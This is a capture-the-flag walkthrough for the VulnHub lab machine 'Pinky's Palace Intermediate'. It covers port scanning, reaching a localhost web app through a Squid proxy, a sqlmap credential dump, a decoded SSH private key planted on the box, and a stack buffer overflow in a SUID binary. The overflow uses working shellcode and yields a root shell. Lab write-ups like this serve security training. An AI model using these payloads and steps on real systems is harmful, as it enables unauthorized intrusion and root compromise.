This one was a fun box.. My second with a buffer overflow… I cheated a bit to take some shortcuts.. Trying to find a more efficient way than using gdb… I will publish the method I built using examples I found elsewhere such as https://blaksec.com
First:
Searching for the target:
nmap -Pn -T4 192.168.56.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-15 12:59 UTC
Nmap scan report for 192.168.56.100
Host is up (0.000096s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:58:FD:DE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.00032s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
8080/tcp open http-proxy
31337/tcp open Elite
MAC Address: 08:00:27:A3:C5:2A (Oracle VirtualBox virtual NIC)
Running Interlace (First time, I wanted to try this…. it’s an automated nmap) for multiple targets/scopes) while investigating ports 8080 and 31337:
Commande:
interlace -tL /root/boxes/pinky/targets.txt -o /root/boxes/pinky/output -cL /root/boxes/pinky/commands.txt -threads 20
Commands.txt:
nmap -Pn -sC -sV -oN _output_/_target_-initial.txt _target_
nmap -Pn -p- -oN _output_/_target_-tcp-allports.txt _target_
nmap -Pn -sU –top-ports 50 -oN _output_/_target_-udp-top50.txt _target_
targets.txt:
192.168.56.101
A few more results:
cat 192.168.56.101-tcp-allports.txt
# Nmap 7.70 scan initiated Mon Jul 15 13:02:11 2019 as: nmap -Pn -p- -oN /root/boxes/pinky/output/192.168.56.101-tcpallports.txt 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00032s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
8080/tcp open http-proxy
31337/tcp open Elite
64666/tcp open unknown
cat 192.168.56.101-udp-top50.txt
# Nmap 7.70 scan initiated Mon Jul 15 13:02:11 2019 as: nmap -Pn -sU –top-ports 50 -oN /root/boxes/pinky/output/
192.168.56.101-udp-top50.txt 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00041s latency).
Not shown: 49 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
Trying to connect:
telnet 192.168.56.101 64666
Trying 192.168.56.101…
Connected to 192.168.56.101.
Escape character is ‘^]’.
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u2
ls
Protocol mismatch.
Connection closed by foreign host.
Port 8080 returns 403 error and nginx/1.10.3
Port 313337 returns ERROR The requested URL ould not be retrieved
But with: squid/3.5.23
Did a searchsploit but it returned nothing good
Running dirbuster on 8080 and 31337:
Nothing for 8080
31337 returns I/O Errors
Trying to connect to port 64666 using burp:
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u2
Protocol mismatch.
Trying to connect:
ssh 192.168.56.101 -p 64666
The authenticity of host ‘[192.168.56.101]:64666 ([192.168.56.101]:64666)’ can’t be established.
ECDSA key fingerprint is SHA256:V5qJjz+sQ8RoowMS4sNiH5d8pNwt6ayyKI68H2twYEo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘[192.168.56.101]:64666’ (ECDSA) to the list of known hosts.
root@192.168.56.101’s password:
Permission denied, please try again.
So Back to SQUID….
Trying to use a proxy to connect with the target localhost:
curl http://127.0.0.1:8080 -x 192.168.56.101:31337
<html>
<head>
<title>Pinky’s HTTP File Server</title>
</head>
<body>
<center><h1>Pinky’s HTTP File Server</h1></center>
<center><h3>Under Development!</h3></center>
</body>
<style>
html{
background: #f74bff;
}
It works…
So now we know we can use dirb:
dirb http://127.0.0.1:8080 /usr/share/wordlists/dirbuster/directory-lowercase-2.3-medium.txt -p 192.168.56.101:31337
—————–
DIRB v2.22
By The Dark Raver
—————–
START_TIME: Tue Jul 16 15:40:03 2019
URL_BASE: http://127.0.0.1:8080/
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
PROXY: 192.168.56.101:31337
—————–
GENERATED WORDS: 87568
—- Scanning URL: http://127.0.0.1:8080/ —-
==> DIRECTORY: http://127.0.0.1:8080/littlesecrets-main/
—- Entering directory: http://127.0.0.1:8080/littlesecrets-main/ —-
—————–
END_TIME: Tue Jul 16 15:43:45 2019
DOWNLOADED: 175136 – FOUND: 0
So let’s curl it:
curl http://127.0.0.1:8080/littlesecrets-main/ -x 192.168.56.101:31337
html>
<head>
<title>Login</title>
</head>
<body>
<center>
<div class=”titlelog”>
<h1>Pinky’s Admin Files Login</h1>
</div>
</center>
<center>
<div class=”log”>
<form action=”login.php” method=”post”>
<h3>User:</h3>
<input type=”text” name=”user”/>
<h3>Password:</h3>
<input type=”password” name=”pass”/>
<input type=”submit” value=”Login”/>
</form>
</div>
</center>
</body>
<style>
html{
background: #f74bff;
}
</style>
<!– Luckily I only allow localhost access to my webserver! Now I won’t get hacked. –>
</html>
Funny!!!!!!
Found also logs.php logging every login attempt into a DB… so…
Running SQLMAP:
sqlmap –proxy=http://192.168.56.101:31337 –dbms=mysql –data=”user=admin&pass=password&submit=Login” –url
http://127.0.0.1:8080/littlesecrets-main/login.php –level=5 –risk=3 –dump users
Password: 3pinkysaf33pinkysaf3
So login:
ssh -l pinkymanage -p 64666 192.168.56.101
pinkymanage@192.168.56.101’s password:
Linux pinkys-palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 2 04:00:51 2018 from 127.0.0.1
pinkymanage@pinkys-palace:~$
Nothing in the user home.
Cannot access pinky user home
So moving to /tmp
Trying to copy linenum.sh …. didn’t work.. Maybe my network config
So good old cut and paste!
Then
./enum.sh -t > enum.txt
Also checking var directory:
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ ll
total 16
drwxr-xr-x 2 root root 4096 Feb 2 2018 .
drwxr-xr-x 3 root root 4096 Feb 2 2018 ..
-rw-r–r– 1 root root 99 Feb 2 2018 note.txt
-rw-r–r– 1 root root 2270 Feb 2 2018 .ultrasecret
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35
$ cat note.txt
Hmm just in case I get locked out of my server I put this rsa key here.. Nobody will find it heh..
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35
$ cat .ultrasecret
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBMTZmeEwzLyto
L0lMVFpld2t2ZWtoSVExeWswb0xJK3kzTjRBSXRraGV6MTFJaGE4CkhjN0tPeC9MOWcyamQzSDhk
R1BVZktLcjlzZXF0Zzk3WktBOTVTL3NiNHczUXRsMUFCdS9wVktaQmJHR3NIRy8KeUl2R0VQS1Mr
QlNaNHN0TVc3SG54N2NpTXVod2Nad0xxWm1zeVN1bUVDVHVlUXN3TlBibElUbHJxb2xwWUY4eApl
NDdFbDlwSHdld05XY0lybXFyYXhDSDVUQzdVaGpnR2FRd21XM3FIeXJTcXAvaksvY3RiMVpwblB2
K0RDODMzCnUvVHlqbTZ6OFJhRFpHL2dSQklyTUduTmJnNHBaRmh0Z2JHVk9mN2ZlR3ZCRlI4QmlU
KzdWRmZPN3lFdnlCeDkKZ3hyeVN4dTJaMGFPTThRUjZNR2FETWpZVW5COWFUWXV3OEdQNHdJREFR
QUJBb0lCQUE2aUg3U0lhOTRQcDRLeApXMUx0cU9VeEQzRlZ3UGNkSFJidG5YYS80d3k0dzl6M1Mv
WjkxSzBrWURPbkEwT1VvWHZJVmwvS3JmNkYxK2lZCnJsZktvOGlNY3UreXhRRXRQa291bDllQS9r
OHJsNmNiWU5jYjNPbkRmQU9IYWxYQVU4TVpGRkF4OWdrY1NwejYKNkxPdWNOSUp1eS8zUVpOSEZo
TlIrWVJDb0RLbkZuRUlMeFlMNVd6MnFwdFdNWUR1d3RtR3pPOTY4WWJMck9WMQpva1dONmdNaUVp
NXFwckJoNWE4d0JSUVZhQnJMWVdnOFdlWGZXZmtHektveEtQRkt6aEk1ajQvRWt4TERKcXQzCkxB
N0pSeG1Gbjc3L21idmFEVzhXWlgwZk9jUzh1Z3lSQkVOMFZwZG5GNmtsNnRmT1hLR2owZ2QrZ0Fp
dzBUVlIKMkNCN1BzRUNnWUVBOElXM1pzS3RiQ2tSQnRGK1ZUQnE0SzQ2czdTaFc5QVo2K2JwYitk
MU5SVDV4UkpHK0RzegpGM2NnNE4rMzluWWc4bUZ3c0Jobi9zemdWQk5XWm91V3JSTnJERXhIMHl1
NkhPSjd6TFdRYXlVaFFKaUlQeHBjCm4vRWVkNlNyY3lTZnpnbW50T2liNGh5R2pGMC93bnRqTWM3
M3h1QVZOdU84QTZXVytoZ1ZIS0VDZ1lFQTVZaVcKSzJ2YlZOQnFFQkNQK3hyQzVkSE9CSUVXdjg5
QkZJbS9Gcy9lc2g4dUU1TG5qMTFlUCsxRVpoMkZLOTJReDlZdgp5MWJNc0FrZitwdEZVSkxjazFN
MjBlZkFhU3ZPaHI1dWFqbnlxQ29mc1NVZktaYWE3blBRb3plcHFNS1hHTW95Ck1FRWVMT3c1NnNK
aFNwMFVkWHlhejlGUUFtdnpTWFVudW8xdCtnTUNnWUVBdWJ4NDJXa0NwU0M5WGtlT3lGaGcKWUdz
TE45VUlPaTlrcFJBbk9seEIzYUQ2RkY0OTRkbE5aaFIvbGtnTTlzMVlPZlJYSWhWbTBaUUNzOHBQ
RVZkQQpIeDE4ci8yRUJhV2h6a1p6bGF5ci9xR29vUXBwUkZtbUozajZyeWZCb21RbzUrSDYyVEE3
bUl1d3Qxb1hMNmM2Ci9hNjNGcVBhbmcyVkZqZmNjL3IrNnFFQ2dZQStBenJmSEZLemhXTkNWOWN1
ZGpwMXNNdENPRVlYS0QxaStSd2gKWTZPODUrT2c4aTJSZEI1RWt5dkprdXdwdjhDZjNPUW93Wmlu
YnErdkcwZ016c0M5Sk54SXRaNHNTK09PVCtDdwozbHNLeCthc0MyVng3UGlLdDh1RWJVTnZEck9Y
eFBqdVJJbU1oWDNZU1EvVUFzQkdSWlhsMDUwVUttb2VUSUtoClNoaU9WUUtCZ1FEc1M0MWltQ3hX
Mm1lNTQxdnR3QWFJcFE1bG81T1Z6RDJBOXRlRVBzVTZGMmg2WDdwV1I2SVgKQTlycExXbWJmeEdn
SjBNVmh4Q2pwZVlnU0M4VXNkTXpOYTJBcGN3T1dRZWtORTRlTHRPN1p2MlNWRHI2Y0lyYwpIY2NF
UCtNR00yZVVmQlBua2FQa2JDUHI3dG5xUGY4ZUpxaVFVa1dWaDJDbll6ZUFIcjVPbUE9PQotLS0t
LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=
The = at the end makes me thinks it’s a Base64 encoded
Decoded: base64 -d .ultrasecret >/tmp/ssh.key
—–BEGIN RSA PRIVATE KEY—–
MIIEpAIBAAKCAQEA16fxL3/+h/ILTZewkvekhIQ1yk0oLI+y3N4AItkhez11Iha8
Hc7KOx/L9g2jd3H8dGPUfKKr9seqtg97ZKA95S/sb4w3Qtl1ABu/pVKZBbGGsHG/
yIvGEPKS+BSZ4stMW7Hnx7ciMuhwcZwLqZmsySumECTueQswNPblITlrqolpYF8x
e47El9pHwewNWcIrmqraxCH5TC7UhjgGaQwmW3qHyrSqp/jK/ctb1ZpnPv+DC833
u/Tyjm6z8RaDZG/gRBIrMGnNbg4pZFhtgbGVOf7feGvBFR8BiT+7VFfO7yEvyBx9
gxrySxu2Z0aOM8QR6MGaDMjYUnB9aTYuw8GP4wIDAQABAoIBAA6iH7SIa94Pp4Kx
W1LtqOUxD3FVwPcdHRbtnXa/4wy4w9z3S/Z91K0kYDOnA0OUoXvIVl/Krf6F1+iY
rlfKo8iMcu+yxQEtPkoul9eA/k8rl6cbYNcb3OnDfAOHalXAU8MZFFAx9gkcSpz6
6LOucNIJuy/3QZNHFhNR+YRCoDKnFnEILxYL5Wz2qptWMYDuwtmGzO968YbLrOV1
okWN6gMiEi5qprBh5a8wBRQVaBrLYWg8WeXfWfkGzKoxKPFKzhI5j4/EkxLDJqt3
LA7JRxmFn77/mbvaDW8WZX0fOcS8ugyRBEN0VpdnF6kl6tfOXKGj0gd+gAiw0TVR
2CB7PsECgYEA8IW3ZsKtbCkRBtF+VTBq4K46s7ShW9AZ6+bpb+d1NRT5xRJG+Dsz
F3cg4N+39nYg8mFwsBhn/szgVBNWZouWrRNrDExH0yu6HOJ7zLWQayUhQJiIPxpc
n/Eed6SrcySfzgmntOib4hyGjF0/wntjMc73xuAVNuO8A6WW+hgVHKECgYEA5YiW
K2vbVNBqEBCP+xrC5dHOBIEWv89BFIm/Fs/esh8uE5Lnj11eP+1EZh2FK92Qx9Yv
y1bMsAkf+ptFUJLck1M20efAaSvOhr5uajnyqCofsSUfKZaa7nPQozepqMKXGMoy
MEEeLOw56sJhSp0UdXyaz9FQAmvzSXUnuo1t+gMCgYEAubx42WkCpSC9XkeOyFhg
YGsLN9UIOi9kpRAnOlxB3aD6FF494dlNZhR/lkgM9s1YOfRXIhVm0ZQCs8pPEVdA
Hx18r/2EBaWhzkZzlayr/qGooQppRFmmJ3j6ryfBomQo5+H62TA7mIuwt1oXL6c6
/a63FqPang2VFjfcc/r+6qECgYA+AzrfHFKzhWNCV9cudjp1sMtCOEYXKD1i+Rwh
Y6O85+Og8i2RdB5EkyvJkuwpv8Cf3OQowZinbq+vG0gMzsC9JNxItZ4sS+OOT+Cw
3lsKx+asC2Vx7PiKt8uEbUNvDrOXxPjuRImMhX3YSQ/UAsBGRZXl050UKmoeTIKh
ShiOVQKBgQDsS41imCxW2me541vtwAaIpQ5lo5OVzD2A9teEPsU6F2h6X7pWR6IX
A9rpLWmbfxGgJ0MVhxCjpeYgSC8UsdMzNa2ApcwOWQekNE4eLtO7Zv2SVDr6cIrc
HccEP+MGM2eUfBPnkaPkbCPr7tnqPf8eJqiQUkWVh2CnYzeAHr5OmA==
—–END RSA PRIVATE KEY—–
Now I can login as pinky:
pinkymanage@pinkys-palace:/tmp$ ssh -l pinky -i /tmp/ssh.key -p 64666 192.168.56.101
Linux pinkys-palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Fri Feb 2 05:54:01 2018 from 172.19.19.2
Interesting exe:
ll
total 44
drwx—— 3 pinky pinky 4096 Jul 22 16:03 .
drwxr-xr-x 4 root root 4096 Feb 2 2018 ..
-rwsr-xr-x 1 root root 8880 Feb 2 2018 adminhelper
lrwxrwxrwx 1 root root 9 Feb 1 2018 .bash_history -> /dev/null
-rw-r–r– 1 pinky pinky 220 Jan 28 2018 .bash_logout
-rw-r–r– 1 pinky pinky 3526 Jul 22 16:03 .bashrc
lrwxrwxrwx 1 pinky pinky 9 Feb 1 2018 .mysql_history -> /dev/null
-rw-r–r– 1 root root 280 Feb 2 2018 note.txt
-rw-r–r– 1 pinky pinky 675 Jan 28 2018 .profile
drwx—— 2 pinky pinky 4096 Feb 2 2018 .ssh
-rw——- 1 pinky pinky 2879 Jul 22 16:03 .viminfo
pinky@pinkys-palace:~$ cat note.txt
Been working on this program to help me when I need to do administrator tasks sudo is just too hard to configure and I can
never remember my root password! Sadly I’m fairly new to C so I was working on my printing skills because Im not sure how
to implement shell spawning yet 🙁
pinky@pinkys-palace:~$ ./adminhelper
pinky@pinkys-palace:~$ ./adminhelper sss
sss
It has a SUID and takes arguments… Let’s try to overflow it
pinky@pinkys-palace:~$ ./adminhelper $(python -c ‘print “A” *300’)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
Bingo!
Now let’s try to exploit it:
Crash it to verify buffer overflow.
Find where it’s crashing – This is what I will explain later….. I need to make progress on this part… I could do it but not explain it properly.
then:
export MYEGG=$(python -c ‘print(“\x90” * 100 +
“\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05”)’)
pinky@pinkys-palace:~$ echo $MYEGG
Let’s find the crash address:
vi getMYEGGAddr.c
#include <stdlib.h>
int main()
{
char *addr;
addr = getenv(“MYEGG”);
printf(“MYEGG is at %p\n”, addr);
exit(0);
}
gcc getMYEGGAddr.c -o getMYEGGAddr
getMYEGGAddr.c: In function ‘main’:
getMYEGGAddr.c:11:5: warning: implicit declaration of function ‘printf’ [-Wimplicit-function-declaration]
printf(“MYEGG is at %p\n”, addr);
^~~~~~
getMYEGGAddr.c:11:5: warning: incompatible implicit declaration of built-in function ‘printf’
getMYEGGAddr.c:11:5: note: include ‘<stdio.h>’ or provide a declaration of ‘printf’
pinky@pinkys-palace:/tmp$ ./getMYEGGAddr
MYEGG is at 0x7fffffffef58
./adminhelper $(python -c ‘print(“A” * 72 + “\x7f\xff\xff\xff\xef\x58″[::-1])’)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
# id
uid=1000(pinky) gid=1000(pinky) euid=0(root) groups=1000(pinky),24(cdrom),25(floppy),29(audio),30(dip),44(video),
46(plugdev),108(netdev)
# whoami
root
# alias ll=”ls -al”
cd /root
# ll
total 40
drwx—— 3 root root 4096 Mar 5 2018 .
drwxr-xr-x 22 root root 4096 Jan 28 2018 ..
lrwxrwxrwx 1 root root 9 Feb 1 2018 .bash_history -> /dev/null
-rw-r–r– 1 root root 570 Jan 31 2010 .bashrc
lrwxrwxrwx 1 root root 9 Feb 2 2018 .mysql_history -> /dev/null
-rw-r–r– 1 root root 148 Aug 17 2015 .profile
drwx—— 2 root root 4096 Feb 2 2018 .ssh
-rw——- 1 root root 14803 Mar 5 2018 .viminfo
-rw-r–r– 1 root root 207 Mar 5 2018 root.txt
# cat root.txt
===========[!!!CONGRATS!!!]===========
[+] You r00ted Pinky’s Palace Intermediate!
[+] I hope you enjoyed this box!
[+] Cheers to VulnHub!
[+] Twitter: @Pink_P4nther
Flag: 99975cfc5e2eb4c199d38d4a2b2c03ce
Thanks @Pink_P4nther for the box… Lot of fun…
And thanks @vulnhub!!!!!!! A big part of my training!
See you for the next box and the Buffer Overflow walthrough.. Almost done writing it for 32 and 64 bits… My most challenging exercise for now!